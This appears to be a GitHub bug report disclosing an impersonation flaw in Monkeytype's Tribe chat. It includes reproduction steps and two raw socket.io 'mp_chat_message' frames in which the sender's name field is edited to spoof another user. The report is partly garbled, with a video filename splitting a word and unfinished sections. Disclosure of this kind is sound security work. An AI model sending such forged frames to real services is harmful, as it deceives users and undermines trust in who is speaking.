Describe the bug: The Tribe Chat is vulnerable to Authentication Bypass by Spoofing allowing any user to send messages that appear to come from other users. Malicious users can abuse current socket message authentication measures to spoof other u
Tribe.Chat.Impersonation.PoC.mp4
sers in the chat room by modifying raw socket.io messages.
To Reproduce
- Go to a tribe chat room, ex: https://dev.monkeytype.com/tribe_1d849e
- Send a message, capturing the socket.io message.
42["mp_chat_message",{"isSystem":false,"isLeader":true,"message":"Hey this is still alice","from":{"id":"UocD_4qRZiXGbXf8AA-n","name":"alice"}}] - Modify the name parameter, and re-send
42["mp_chat_message",{"isSystem":false,"isLeader":true,"message":"Hey this is still alice","from":{"id":"UocD_4qRZiXGbXf8AA-n","name":"bob"}}]
Expected behavior After sending the socket
Screenshots
Desktop:
- OS: []
- Browser []
- Browser Version []
Additional context